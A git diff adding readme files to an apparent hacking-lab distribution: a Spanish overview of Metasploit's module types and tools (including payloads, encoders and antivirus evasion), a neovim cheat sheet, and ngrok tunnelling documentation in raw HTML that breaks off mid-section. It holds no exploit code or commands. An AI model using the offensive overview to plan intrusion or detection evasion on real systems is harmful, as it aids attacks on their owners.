b/.deb/home/.local/etc/i-Haklab/Tools/Readme/M/metasploit.md @@ -0,0 +1,88 @@ +The Metasploit Framework is released under a BSD-style license. + +You can find documentation on Metasploit and how to use it at: + https://docs.metasploit.com/ + +Information about setting up a development environment can be found at: + https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html + +Our bug and feature request tracker can be found at: + https://github.com/rapid7/metasploit-framework/issues + +New bugs and feature requests should be directed to: + https://r-7.co/MSF-BUGv1 + +API documentation for writing modules can be found at: + https://docs.metasploit.com/api/ + + +Quick Guide +-- +Metasploit es un framework de pruebas de penetración de código abierto que +proporciona una plataforma para desarrollar y ejecutar exploits contra sistemas +informáticos y redes. A continuación, describo brevemente cada uno de los componentes: + +Exploits: son programas o scripts que aprovechan vulnerabilidades en sistemas informáticos +o aplicaciones para obtener acceso no autorizado al sistema o para ejecutar comandos en el sistema afectado. +Los exploits se utilizan en Metasploit para automatizar la ejecución de ataques. + +Auxiliary: son módulos que no son exploits propiamente dichos, pero que proporcionan funcionalidades +adicionales para los atacantes. Por ejemplo, los módulos auxiliary pueden ser usados para escanear redes, +recolectar información del sistema, obtener acceso a credenciales o realizar ataques de denegación de servicio. + +Post: son módulos que se ejecutan después de que se ha obtenido acceso a un sistema. +Estos módulos permiten a los atacantes realizar acciones posteriores a la explotación de una vulnerabilidad, +como moverse lateralmente en una red, exfiltrar datos, instalar software malicioso o realizar otras +acciones para mantener el acceso al sistema. + +Payloads: son fragmentos de código que se entregan al sistema vulnerable para ejecutar un comando o realizar +una acción específica. Los payloads pueden ser utilizados en conjunto con exploits para proporcionar +una funcionalidad adicional, como obtener una shell remota, instalar un backdoor o descargar y ejecutar malware. + +Encoders: son módulos que se utilizan para ofuscar payloads y exploits para evitar la detección +por parte de software de seguridad. Los encoders utilizan técnicas de ofuscación como el cifrado, +la compresión o la modificación del código para hacer que los payloads y exploits sean más difíciles +de detectar por software antivirus y de análisis de seguridad. + +Nops: son módulos que se utilizan para agregar "no-operation" o instrucciones de "nop" al exploit o payload. +Estas instrucciones no hacen nada en el sistema objetivo, pero pueden ser utilizadas para rellenar +el espacio vacío en el código del exploit o payload. Los nops se utilizan para ajustar el tamaño del exploit +o payload para que encajen en el espacio disponible en la memoria del sistema objetivo. + +Evasion: son módulos que se utilizan para evitar la detección por parte de software de seguridad. +Los módulos de evasión se utilizan para alterar los patrones de los payloads y exploits, evitando +así la detección por parte de los sistemas de defensa y los antivirus. Los módulos de evasión +pueden utilizarse para evadir técnicas como la detección de firmas y el análisis de comportamiento. + +Msfconsole y msfvenom son dos herramientas principales en Metasploit Framework +que se utilizan para diferentes propósitos. + +Msfconsole es la interfaz de línea de comandos (CLI) principal de Metasploit. +Permite a los usuarios interactuar con el framework, cargar módulos, lanzar exploits, +ejecutar payloads y realizar otras acciones relacionadas con la explotación y la prueba de penetración. +Msfconsole es una herramienta interactiva que proporciona una amplia variedad de comandos para el análisis, +la explotación y la postexplotación de sistemas y redes. + +Msfvenom, por otro lado, es una herramienta independiente de la interfaz de línea de comandos +que se utiliza para generar payloads personalizados para su uso en exploits. +Los payloads son el código que se entrega al sistema objetivo después de que se ha explotado +una vulnerabilidad. Msfvenom puede generar payloads para diferentes arquitecturas de sistemas operativos +y puede codificarlos en diferentes formatos, como archivos binarios, scripts de shell, +códigos fuente y otros formatos personalizados. Los payloads generados por msfvenom se utilizan +para ejecutar comandos en sistemas remotos, obtener acceso remoto y realizar otras acciones de postexplotación. + +En resumen, mientras que msfconsole es la interfaz de línea de comandos principal para +interactuar con Metasploit, msfvenom es una herramienta especializada para generar payloads +personalizados para su uso en exploits. + + +Using Metasploit +-- +Metasploit can do all sorts of things. The first thing you'll want to do +is start `msfconsole`, but after that, you'll probably be best served by +reading [Metasploit Unleashed][unleashed], the [great community +resources](https://metasploit.github.io), or take a look at the +[Using Metasploit](https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html) +page on the documentation website. + + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/neovim.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/neovim.md new file mode 100755 index 00000000..a1f2d862 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/neovim.md @@ -0,0 +1,53 @@ +### What is neovim? +Neovim is a text editor rewrite of vim in Lua with the goal of modularizing the code to make it +more maintainable and easier to contribute to. As the official website says : +“Neovim is built for users who want the good parts of Vim, and more.” + +For more info join to : https://neovim.info + +i-Haklab pre-configue neovim with text predictible in bash, python, ruby, C++ and markdown but, +you can reconfigigure it manually following the guide in : + +> https://victorh028.github.io/NVIM/# + +Neovim Cheat Sheet in i-Haklab + + +esc **mode normal** + | ╰──➤ + | ╰──➤ + | ╰──➤ b Realiza un salto palabra en sentido contr + | ╰──➤ e Realiza un salto palabra por palabra + | ╰──➤ 0 Resliza un salto al comienso de la linea + | ╰──➤ $ Realiza un salto al final de la linea + | ╰──➤ gg Da un salto al inicio del archivo + | ╰──➤ G Da un salto al final de la linea + | ╰──➤ d Delete the current line + | ╰──➤ r Replace one character + | ╰──➤ R Heplace all the line + | ╰──➤ . Repeat the last action + | ╰──➤ u Undo the last modification one by one + | ╰──➤ U Restore all the modifications + | ╰──➤ gcc Commentingi line + | + ╰──➤ + + ╰──➤ w Save file + +a **mode editor** + +v or V **mode visual** + ╰──➤ + ╰──➤ c cut the selected text + ╰──➤ y copy the selected text + ╰──➤ p paste the selected text + +: **mode command** (only in mode normal) + ╰──➤ PlugUpdate Update the plugins + ╰──➤ PlugInstall Install the plugins + ╰──➤ PlugStatus Get neovim status + + +# Config +`~/.config/nvim/init.lua` + + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/ngrok.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/ngrok.md new file mode 100755 index 00000000..35fedddc --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/ngrok.md @@ -0,0 +1,5283 @@ +Documentation + +Expose a local web server to the internet + +ngrok allows you to expose a web server running on your local machine to the internet. Just tell ngrok what port your web server is listening on. + +If you don't know what port your web server is listening on, it's probably port 80, the default for HTTP. +Example: Expose a web server on port 80 of your local machine to the internet + +ngrok http 80 + +If your web server is serving secure content that isn't on port 443, you can provide the full address as well. Example: Expose a secure web server on port 5001 of your local machine to the internet + +ngrok http https://localhost:5001 + +When you start ngrok, it will display a UI in your terminal with the public URL of your tunnel and other status and metrics information about connections made over your tunnel. + +The ngrok console UI +ngrok by @inconshreveable + +Tunnel Status online +Version 2.0/2.0 +Web Interface http://127.0.0.1:4040 +Forwarding http://92832de0.ngrok.io -> localhost:80 +Forwarding https://92832de0.ngrok.io -> localhost:80 + +Connnections ttl opn rt1 rt5 p50 p90 + 0 0 0.00 0.00 0.00 0.00 + +Inspecting your traffic + +ngrok provides a real-time web UI where you can introspect all of the HTTP traffic running over your tunnels. After you've started ngrok, just open http://localhost:4040">http://localhost:4040 in a web browser to inspect request details. + +Try making a request to your public URL. After you have, look back at the inspection UI. You will see all of the details of the request and response including the time, duration, headers, query parameters and request payload as well as the raw bytes on the wire. + +Detailed introspection of HTTP requests and responses + +Replaying requests +Developing for webhooks issued by external APIs can often slow down your development cycle by requiring you do some work, like dialing a phone, to trigger the hook request. ngrok allows you to replay any request with a single click dramatically speeding up your iteration cycle. Click the Replay button at the top-right corner of any request on the web inspection UI to replay it. Replay any request against your tunneled web server with one click + + +Installing your Authtoken + +Many advanced features of the ngrok.com service described in further sections require that you "https://dashboard.ngrok.com/signup" sign up for an account. Once you've signed up, you need to configure ngrok with the authtoken that appears on your dashboard. This will grant you access to account-only features. ngrok has a simple 'authtoken' command to make this easy. Under the hood, all the authtoken command does is to add (or modify) the auth property in your ngrok configuration file + + +Install your authtoken + +ngrok authtoken YOUR_AUTHTOKEN + + +Getting a stable URL + +On the free plan, ngrok's URLs are randomly generated and temporary. If you want to use the same URL every time, you need to upgrade to a paid plan so that you can use the subdomain option for a stable URL with HTTP or TLS tunnels and the remote-addr option for a stable address with TCP tunnels. + + +HTTP Tunnels +Custom subdomain names +ngrok assigns random hexadecimal names to the HTTP tunnels it opens for you. +This is okay for one-time personal uses. But if you're displaying the URL at a hackathon or integrating with a third-party webhook, it can be frustrating if the tunnel name changes or is difficult to read. You can specify a custom subdomain for your tunnel URL with the -subdomain switch. + +Example: Open a tunnel with the subdomain 'inconshreveable': + +ngrok http -subdomain=inconshreveable 80 +ngrok by @inconshreveable +... +Forwarding http://inconshreveable.ngrok.io -> 127.0.0.1:80 +Forwarding https://inconshreveable.ngrok.io -> 127.0.0.1:80 + + +Password protecting your tunnel +Anyone who can guess your tunnel URL can access your local web server unless you protect it with a password. You can make your tunnels secure with the-auth switch. This enforces HTTP Basic Auth on all requests with the username and password you specify as an argument. Example: Password-protect your tunnel + +ngrok http -auth="username:password" 8080 + + + +Tunnels on custom branded domains + +Instead of your tunnel appearing as a subdomain of ngrok.io, you can run ngrok tunnels over your domains. To run a tunnel over dev.example.com, follow these steps: + +Navigate to the Domains tab of your ngrok.com dashboard and click 'Add a domain'. Enter dev.example.com as a Reserved Domain. This guarantees that no one else can hijack your domain name with their own tunnel. +On your dashboard, click on the 'CNAME' icon to copy your CNAME target. +Create a DNS CNAME record from dev.example.com to your CNAME target. In this example, we would point the CNAME record to 2w9c34maz.cname.ngrok.io +Invoke ngrok with the -hostname switch and specify the name of your custom domain as an argument. Make sure the -region you specify matches the region in which you reserved your domain. +Example: Run a tunnel over a custom domain + +ngrok http -region=us -hostname=dev.example.com 8000 + +Accessing custom domain tunnels over HTTPS will still work, but the certificate will not match. If you have a TLS certificate/key pair, try using a TLS tunnel. + +Run a tunnel over a custom domain + +ngrok http -region=us -hostname=dev.example.com 8000 + +Accessing custom domain tunnels over HTTPS will still work,but the certificate will not match. If you have a TLS certificate/key pair, try using a TLS tunnel. + + + +Local HTTPS servers +ngrok assumes that the server it is forwarding to is listening for unencrypted HTTP traffic, but what if your server is listening for encrypted HTTPS traffic? You can specify a URL with an scheme to request that ngrok speak HTTPS to your local server. + +Forward to an https server by specifying the https:// +ngrok http https://localhost:8443 + +As a special case, ngrok assumes that if you forward to port 443 on any host that it should send HTTPS traffic and will act as if you specified an https:// URL. +Forward to the default https port on localhost +ngrok http 443 +ngrok assumes that your local network is private and it does not do any validation of the TLS certificate presented by your local server + + + +Rewriting the Host header +When forwarding to a local port, ngrok does not modify the tunneled HTTP requests at all, they are copied to your server byte-for-byte as they are received. Some application server like WAMP and MAMP and use the Host header for determining which development site to display. For this reason, ngrok can rewrite your requests with a modified Host header. Use the -host-header switch to rewrite incoming HTTP requests. +If rewrite is specified, the Host header will be rewritten to match the hostname portion of the forwarding address. Any other value will cause the Host header to be rewritten to that value. + +Rewrite the Host header to 'site.dev' + +
+
ngrok http -host-header=rewrite site.dev:80
+
+
Rewrite the Host header to 'example.com'
+
+
ngrok http -host-header=example.com 80
+
+

Serving local directories with ngrok's built-in fileserver

+

ngrok can serve local file system directories by using its own built-in fileserver, no separate + server needed! You can serve files using the file:// scheme when specifying the forwarding URL. +

+

All paths must be specified as absolute paths, + the file:// URL scheme has no notion of relative paths. +

+
Share a folder on your computer with authentication
+
+
ngrok http -auth="user:password" file:///Users/alan/share
+
+

File URLs can look a little weird on Windows, but they work the same:

+
Share a folder on your Windows computer
+
+
ngrok http "file:///C:\Users\alan\Public Folder"
+
+ +

Tunneling only HTTP or HTTPS

+

By default, when ngrok runs an HTTP tunnel, it opens endpoints for both HTTP + and HTTPS traffic. If you wish to only forward HTTP or HTTPS traffic, but not both, + you can toggle this behavior with the -bind-tls switch. +

+
Example: Only listen on an HTTP tunnel endpoint
+
+
ngrok http -bind-tls=false site.dev:80
+
+
Example: Only listen on an HTTPS tunnel endpoint
+
+
ngrok http -bind-tls=true site.dev:80
+
+

Disabling Inspection

+

ngrok records each HTTP request and response over your tunnels for inspection + and replay. While this is really useful for development, when you're running ngrok + on production services, you may wish to disable it for security and performance. + Use the -inspect switch to disable inspection on your tunnel. +

+
Example: An http tunnel with no inspection
+
+
ngrok http -inspect=false 80
+
+

Websockets

+

+ Websocket endpoints work through ngrok's http tunnels without any changes. + However, there is currently no support for introspecting them beyond the initial 101 + Switching Protocols response. +

+

TLS Tunnels

+

HTTPS tunnels terminate all TLS (SSL) traffic at the ngrok.com servers using ngrok.com + certificates. For production-grade services, you'll want your tunneled traffic + to be encrypted with your own TLS key and certificate. ngrok makes this extraordinarily easy + with TLS tunnels. +

+
Forward TLS traffic to a local HTTPS server on port 443
+
+
ngrok tls -subdomain=encrypted 443
+
+

Once your tunnel is running, try accessing it with curl. +

+
+
curl --insecure https://encrypted.ngrok.io
+
+

TLS Tunnels without certificate warnings

+

Notice that --insecure option in the previous curl command example? You need to specify that because + your local HTTPS server doesn't have the TLS key and certificate necessary to terminate traffic for any ngrok.io + subdomains. If you try to load up that page in a web browser, you'll notice that it tells you the page + could be insecure because the certificate does not match. +

+

If you want your certificates to match and be protected from man-in-the-middle attacks, you need two things. + First, you'll need to buy an SSL (TLS) certificate for a domain name that you own and configure your + local web server to use that certificate and its private key to terminate TLS connections. How to do + this is specific to your web server and SSL certificate provider and beyond the scope of this + documentation. For the sake of example, we'll assume that you were issued an SSL certificate for the domain + secure.example.com. +

+

Once you have your key and certificate and have installed them properly, it's now time to run a + TLS tunnel on your own custom domain name. The instructions to set this up are identical to those + described in the HTTP tunnels section: Tunnels on custom domains. The + custom domain you register should be the same as the one in your SSL certificate (secure.example.com). After + you've set up the custom domain, use the -hostname argument to start the TLS + tunnel on your own domain. +

+
Forward TLS traffic over your own custom domain
+
+
ngrok tls -region=us -hostname=secure.example.com 443
+
+

Terminating TLS connections

+

It's possible that the service you're trying to expose may not have the capability to terminate TLS connections. + The ngrok client can do this for you so that you can encrypt your traffic end-to-end but not have to worry about + whether the local service has TLS support. Specify both the -crt and -key command line + options to specify the filesystem paths to your TLS certificate and key and the ngrok client will take care of + terminating TLS connections for you. +

+
Offload TLS Termination to the ngrok client
+
+
ngrok tls -region=us -hostname secure.example.com -key /path/to/tls.key -crt /path/to/tls.crt 80
+
+

Running non-HTTP services over TLS tunnels

+

ngrok TLS tunnels make no assumptions about the underlying protocol being transported. All + examples in this documentation use HTTPS because it is the most common use case, but you can run + run any TLS-wrapped protocol over a TLS tunnel (e.g. imaps, smtps, sips, etc) without any changes. +

+

Compatible Clients

+

TLS tunnels work by inspecting the data present in the Server Name Information (SNI) extension on incoming TLS + connections. Not all clients that initiate TLS connections support setting the SNI extension data. These clients + will not work properly with ngrok's TLS tunnels. Fortunately, nearly all modern browsers use SNI. Some modern + software libraries do not though. The following list of clients do not support SNI and will not work with TLS tunnels: +

A more complete list can be found on the Server Name Indiciation page on Wikipedia +

+

TCP Tunnels

+

Not all services you wish to expose are HTTP or TLS based. ngrok TCP tunnels allow you to expose + any networked service that runs over TCP. This is commonly used to expose SSH, game servers, databases + and more. Starting a TCP tunnel is easy. +

+
Expose a TCP based service running on port 1234
+
+
ngrok tcp 1234
+
+

Examples

+
Expose an SSH server listening on the default port
+
+
ngrok tcp 22
+
+
Expose a Postgres server listening on the default port
+
+
ngrok tcp 5432
+
+
Expose an RDP server listening on the default port
+
+
ngrok tcp 3389
+
+

Listening on a reserved remote address

+

Normally, the remote address and port is assigned randomly each time you start a TCP tunnel. For + production services (and convenience) you often want a stable, guaranteed remote address. To do this, + first, log in to your ngrok.com dashboard and click "Reserve Address" in the "Reserved TCP Addresses" + section. Then use the -remote-addr option when invoking ngrok to bind a tunnel + on your reserved TCP address. Make sure the -region you specify matches the region in which + you reserved your address. +

+
Bind a TCP tunnel on a reserved remote address
+
+
ngrok tcp --region=us --remote-addr 1.tcp.ngrok.io:20301 22
+
+

More Tunneling Options

+

Wildcard domains

+

ngrok permits you to bind HTTP and TLS tunnels to wildcard domains. All wildcard domains, + even those that are subdomains of ngrok.io must first be reserved for your account on your dashboard. + When using -hostname or -subdomain, specify a leading asterisk + to bind a wildcard domain. +

+
Bind a tunnel to receive traffic on all subdomains of example.com
+
+
ngrok http --region=us --hostname *.example.com 80
+
+

Wildcard domain rules

+

The use of wildcard domains creates ambiguities in some aspects of the ngrok.com service. The following + rules are used to resolve these situations and are important to understand if you are using wildcard domains. +

+

For the purposes of example, assume you have reserved the address *.example.com for your account. +

+
    +
  • Connections to nested subdomains (e.g. foo.bar.baz.example.com) will route to your wildcard tunnel.
  • +
  • You may bind tunnels on any valid subdomain of example.com without creating an additional reserved domain entry.
  • +
  • No other account may reserve foo.example.com or any other subdomain that would match a wildcard domain reserved by another account.
  • +
  • Connections are routed to the most specific matching tunnel online. If you are running tunnels for both foo.example.com and *.example.com, requests to foo.example.com will always route to foo.example.com
  • +
+

Forwarding to servers on a different machine (non-local services)

+

ngrok can forward to services that aren't running on your local machine. Instead of specifying + a port number, just specify a network address and port instead. +

+
Example: Forward to a web server on a different machine
+
+
ngrok http 192.168.1.1:8080
+
+ +

The ngrok configuration file

+

Sometimes your configuration for ngrok is too complex to be expressed in command line options. ngrok supports + an optional, extremely simple YAML configuration file which provides you with the power to run multiple + tunnels simultaneously as well as to tweak some of ngrok's more arcane settings. +

+

Configuration file location

+

You may pass a path to an explicit configuration file with the -config option. This is recommended + for all production deployments. +

+
Explicitly specify a configuration file location
+
+
ngrok http -config=/opt/ngrok/conf/ngrok.yml 8000
+
+

You may pass the -config option more than once. If you do, the first configuration is parsed and + each successive configuration is merged on top of it. This allows you to have per-project ngrok configuration files + with tunnel definitions but a master configuration file in your home directory with your authtoken and other + global settings. +

+
Specify an additional configuration file with project-specific overrides
+
+
ngrok start -config ~/ngrok.yml -config ~/projects/example/ngrok.yml demo admin
+
+

Default configuration file location

+

If you don't specify a location for a configuration file, ngrok tries to read + one from the default location $HOME/.ngrok2/ngrok.yml. The configuration file + is optional; no error is emitted if that path does not exist. +

+

In the default path, $HOME is the home directory for the current user as defined by your operating system. + It is not the environment variable $HOME, although they are often the same. For + major operating systems, if your username is example the default configuration would + likely be found at the following paths: +

+ + + + + + + + + + + + + +
OS X/Users/example/.ngrok2/ngrok.yml +
Linux/home/example/.ngrok2/ngrok.yml +
WindowsC:\Users\example\.ngrok2\ngrok.yml +
+

Tunnel definitions

+

The most common use of the configuration file is to define tunnel configurations. Defining + tunnel configurations is useful because you may then start pre-configured tunnels by name + from your command line without remembering all of the right arguments every time. +

+

Tunnels are defined as mapping of name -> configuration under the tunnels property + in your configuration file. +

+
Define two tunnels named 'httpbin' and 'demo'
+
+
tunnels:
+  httpbin:
+    proto: http
+    addr: 8000
+    subdomain: alan-httpbin
+  demo:
+    proto: http
+    addr: 9090
+    hostname: demo.inconshreveable.com
+    inspect: false
+    auth: "demo:secret"
+
+
Start the tunnel named 'httpbin'
+
+
ngrok start httpbin
+
+

Each tunnel you define is a map of configuration option names to values. The name of a configuration + option is usually the same as its corresponding command line switch. Every tunnel must define + proto and addr. Other properties are available and many are protocol-specific. +

+
Tunnel Configuration Properties
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
proto + +
required
+
all
+
tunnel protocol name, one of http, tcp, tls
addr + +
required
+
all
+
forward traffic to this local port number or network address
inspect + +
http
+
enable http request inspection
auth + +
http
+
HTTP basic authentication credentials to enforce on tunneled requests
host_header + +
http
+
Rewrite the HTTP Host header to this value, or preserve to leave it unchanged
bind_tls + +
http
+
bind an HTTPS or HTTP endpoint or both true, false, or both
subdomain + +
http
+
tls
+
subdomain name to request. If unspecified, uses the tunnel name
hostname + +
http
+
tls
+
hostname to request (requires reserved name and DNS CNAME)
crt + +
tls
+
PEM TLS certificate at this path to terminate TLS traffic before forwarding locally
key + +
tls
+
PEM TLS private key at this path to terminate TLS traffic before forwarding locally
client_cas + +
tls
+
PEM TLS certificate authority at this path will verify incoming TLS client connection certificates.
remote_addr + +
tcp
+
bind the remote TCP port on the given address
metadata + +
all
+
arbitrary user-defined metadata that will appear in the ngrok service API when listing tunnels
+

Running multiple simultaneous tunnels

+

You can pass multiple tunnel names to ngrok start and ngrok will run them all + simultaneously. +

+
Start three named tunnels from the configuration file
+
+
ngrok start admin ssh metrics
+
+
+
ngrok by @inconshreveable
+
+Tunnel Status                 online
+Version                       2.0/2.0
+Web Interface                 http://127.0.0.1:4040
+Forwarding                    http://admin.ngrok.io -> 10.0.0.1:9001
+Forwarding                    http://device-metrics.ngrok.io -> localhost:2015
+Forwarding                    https://admin.ngrok.io -> 10.0.0.1:9001
+Forwarding                    https://device-metrics.ngrok.io -> localhost:2015
+Forwarding                    tcp://0.tcp.ngrok.io:48590 -> localhost:22
+...
+
+

You can also ask ngrok to start all of the tunnels defined in the configuration file with the + --all switch. +

+
Start all tunnels defined in the configuration file
+
+
ngrok start --all
+
+

Conversely, you may ask ngrok to run without starting any tunnels with the --none + switch. This is useful if you plan to manage ngrok's tunnels entirely via the API. +

+
Run ngrok without starting any tunnels
+
+
ngrok start --none
+
+

Example Configuration Files

+

Example configuration files are presented below. The subsequent section contains full documentation for all configuration parameters shown in these examples.

+
Run tunnels for multiple virtual hosted development sites
+
+
authtoken: 4nq9771bPxe8ctg7LKr_2ClH7Y15Zqe4bWLWF9p
+tunnels:
+  app-foo:
+    addr: 80
+    proto: http
+    host_header: app-foo.dev
+  app-bar:
+    addr: 80
+    proto: http
+    host_header: app-bar.dev
+
+
Tunnel a custom domain over both http and https with your own certificate
+
+
authtoken: 4nq9771bPxe8ctg7LKr_2ClH7Y15Zqe4bWLWF9p
+tunnels:
+  myapp-http:
+    addr: 80
+    proto: http
+    hostname: example.com
+    bind_tls: false
+  mypp-https:
+    addr: 443
+    proto: tls
+    hostname: example.com
+
+
Expose ngrok's web inspection interface and API over a tunnel
+
+
authtoken: 4nq9771bPxe8ctg7LKr_2ClH7Y15Zqe4bWLWF9p
+tunnels:
+  myapp-http:
+    addr: 4040
+    proto: http
+    subdomain: myapp-inspect
+    auth: "user:secretpassword"
+    inspect: false
+
+
Example configuration file with all options
+
+
authtoken: 4nq9771bPxe8ctg7LKr_2ClH7Y15Zqe4bWLWF9p
+region: us
+console_ui: true
+http_proxy: false
+inspect_db_size: 50000000
+log_level: info
+log_format: json
+log: /var/log/ngrok.log
+metadata: '{"serial": "00012xa-33rUtz9", "comment": "For customer alan@example.com"}'
+root_cas: trusted
+socks5_proxy: "socks5://localhost:9150"
+update: false
+update_channel: stable
+web_addr: localhost:4040
+tunnels:
+  website:
+    addr: 8888
+    auth: bob:bobpassword
+    bind_tls: true
+    host_header: "myapp.dev"
+    inspect: false
+    proto: http
+    subdomain: myapp
+
+  e2etls:
+    addr: 9000
+    proto: tls
+    hostname: myapp.example.com
+    crt: example.crt
+    key: example.key
+
+  ssh-access:
+    addr: 22
+    proto: tcp
+    remote_addr: 1.tcp.ngrok.io:12345
+
+

Configuration Options

+

authtoken +

+

This option specifies the authentication token used to authenticate this client when it connects to the ngrok.com + service. After you've created an ngrok.com account, your dashboard will display the authtoken assigned to your + account. +

+
ngrok.yml specifying an authtoken
+
+
authtoken: 4nq9771bPxe8ctg7LKr_2ClH7Y15Zqe4bWLWF9p
+
+

console_ui +

+ + + + + + + + + + + + + + + + +
true + enable the console UI
false + disable the console UI
iftty + +
default
+
enable the UI only if standard out is a TTY (not a file or pipe)
+

console_ui_color +

+ + + + + + + + + + + +
transparent + don't set a background color when displaying the console UI
black + +
default
+
set the console UI's background to black
+

http_proxy +

+

URL of an HTTP proxy to use for establishing the tunnel connection. Many HTTP proxies have connection + size and duration limits that will cause ngrok to fail. Like many other networking tools, ngrok will also + respect the environment variable http_proxy if it is set. +

+
Example of ngrok over an authenticated HTTP proxy
+
+
http_proxy: "http://user:password@proxy.company:3128"
+
+

inspect_db_size +

+ + + + + + + + + + + + + + + + +
positive integerssize in bytes of the upper limit on memory to allocate to save requests over HTTP tunnels for inspection and replay.
0 + +
default
+
use the default allocation limit, 50MB
-1 + disable the inspection database; this has the effective behavior of disabling inspection for all tunnels
+

log_level +

+

Logging level of detail. In increasing order of verbosity, possible values are:crit,warn,error,info,debug +

+

log_format +

+

Format of written log records.

+ + + + + + + + + + + + + + + + +
logfmt + human and machine friendly key/value pairs
json + newline-separated JSON objects
term + +
default
+
custom colored human format if standard out is a TTY, otherwise same as logfmt
+

log +

+

Write logs to this target destination.

+ + + + + + + + + + + + + + + + + + + + + +
stdout + write to standard out
stderr + write to standard error
false + +
default
+
disable logging
other valueswrite log records to file path on disk
+
+
log: /var/log/ngrok.log
+
+

metadata +

+

Opaque, user-supplied string that will be returned as part of the ngrok.com API response to the List Online Tunnels resource for all tunnels started by this client. This is a useful mechanism to identify tunnels by your own device or customer identifier. Maximum 4096 characters.

+
+
metadata: bad8c1c0-8fce-11e4-b4a9-0800200c9a66
+
+

region +

+

Choose the region where the ngrok client will connect to host its tunnels.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
us + +
default
+
United States
eu + Europe
ap + Asia/Pacific
au + Australia
sa + South America
jp + Japan
in + India
+

root_cas +

+

The root certificate authorities used to validate the TLS connection to the ngrok server.

+ + + + + + + + + + + + + + + + +
trusted + +
default
+
use only the trusted certificate root for the ngrok.com tunnel service
host + use the root certificates trusted by the host's operating system. You will likely want to use this option to connect to third-party ngrok servers.
other valuespath to a certificate PEM file on disk with certificate authorities to trust
+

socks5_proxy +

+

URL of a SOCKS5 proxy to use for establishing a connection to the ngrok server.

+
+
socks5_proxy: "socks5://localhost:9150"
+
+

tunnels +

+

A map of names to tunnel definitions. See Tunnel definitions for more details.

+

update +

+ + + + + + + + + + + +
true + automatically update ngrok to the latest version, when available
false + +
default
+
never update ngrok unless manually initiated by the user
+

update_channel +

+

The update channel determines the stability of released builds to update to. Use 'stable' for all production deployments.

+ + + + + + + + + + + +
stable + +
default
+
channel
beta + update to new beta builds when available
+

web_addr +

+

Network address to bind on for serving the local web interface and api.

+ + + + + + + + + + + + + + + + +
network addressbind to this network address
127.0.0.1:4040 + +
default
+
default network address
false + disable the web UI
+ +

Web Inspection Interface

+

+ The ngrok client ships with a powerful realtime inspection interface which allows you to see what traffic is sent to your application server and what responses your server is returning. +

+

Inspecting requests

+

+ Every HTTP request through your tunnels will be displayed in the inspection interface. After you start ngrok, open http://localhost:4040 in a browser. + You will see all of the details of every request and response including the time, duration, source IP, headers, query parameters, request payload and response body as well as the raw bytes on the wire. +

+

+ The inspection interface has a few limitations. If an entity-body is too long, ngrok may only capture the initial portion of the request body. Furthermore, ngrok does not display provisional 100 responses from a server. +

+
+ Inspection is only supported for http tunnels. tcp and tls tunnels do not support any inspection. +
+
Detailed introspection of HTTP requests and responses
+

Request body validation

+

+ ngrok has special support for the most common data interchange formats in use on the web. Any XML or JSON data in request or response bodies is automatically pretty-printed for you and checked for syntax errors. +

+
The location of a JSON syntax error is highlighted
+

Filtering requests

+

+ Your application server may receive many requests, but you are often only interested in inspecting some of them. You can filter + the requests that ngrok displays to you. You can filter based on the request path, response status code, + size of the response body, duration of the request and the value of any header. +

+
Click the filter bar for filtering options
+ +

+
+ You may specify multiple filters. If you do, requests will only be shown if they much all filters. +

+
Filter requests by path and status code
+ +

Replaying requests

+

+ Developing for webhooks issued by external APIs can often slow down your development cycle by requiring you do some work, like dialing a phone, to trigger the hook request. ngrok allows you to replay any request with a single click, dramatically speeding up your iteration cycle. Click the Replay button at the top-right corner of any request on the web inspection UI to replay it. +

+
Replay any request against your tunneled web server with one click
+ +

Replaying modified requests

+

+ Sometimes you want to modify a request before you replay it to test a new behavior in your application server. +

+
Click the dropdown arrow on the 'Replay' button to modify a request before it is replayed
+ +

+
+ The replay editor allows you to modify every aspect of the http request before replaying it, including the + method, path, headers, trailers and request body. +

+
The request replay modification editor
+ +

Status page: metrics and configuration

+

+ ngrok's local web interface has a dedicated status page that shows configuration and metrics + information about the running ngrok process. You can access it at http://localhost:4040/status. +

+

+ The status page displays the configuration of each running tunnel and any global configuration options + that ngrok has parsed from its configuration file. +

+
Tunnel and global configuration
+ +

+
+ The status page also display metrics about the traffic through each tunnel. It display connection rates and connection duration + percentiles for all tunnels. For http tunnels, it also displays http request rates and http response duration percentiles. +

+
Tunnel traffic metrics
+ + +

Event Subscriptions

+

Event Subscriptions capture events from your ngrok account and send them to configurable destinations like Amazon CloudWatch Logs, Amazon Kinesis (as a data stream) or Amazon Kinesis Firehose (as a delivery stream).

+

You might create an Event Subscription to audit every time a team member gets created, updated, and deleted in your ngrok account, or every time somebody connects to an ngrok tunnel.

+

Event Types

+

Many objects within ngrok have corresponding events that are generated when an instance of the object is created, updated and deleted. For example, an event of type ip_policy_created.v0 is generated when an IP Policy is created. All Event Types have a version, represented in the Event Type string following the period. The initial version for all Event Types is v0.

+

Parts of an Event Subscription

+

You can think of an Event Subscription as a set of Sources attached to one or more Destinations. Sources define which events to capture, and Destinations specify where to send those events.

+

Event Sources

+

An Event Source specifies the type of event to capture. A single Event Subscription can have many Sources.

+

Some event types support filters and selectable fields. Not all selectable fields are usable in filters. A full list of event types and their fields follows. A field marked `filterable` indicates that it is usable in the filter for an event source.

+ +
api_key_created.v0
+

Triggers when an API key is created

+

+This event type does not support filters or selectable fields. +

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
idstring

unique API key resource identifier

+
uristring

URI to the API resource of this API key

+
descriptionstring

human-readable description of what uses the API key to authenticate. optional, max 255 bytes.

+
metadatastring

arbitrary user-defined data of this API key. optional, max 4096 bytes

+
created_atstring

timestamp when the api key was created, RFC 3339 format

+
tokenstring

the bearer token that can be placed into the Authorization header to authenticate request to the ngrok API. This value is only available one time, on the API response from key creation. Otherwise it is null.

+
+
api_key_deleted.v0
+

Triggers when an API key is deleted

+

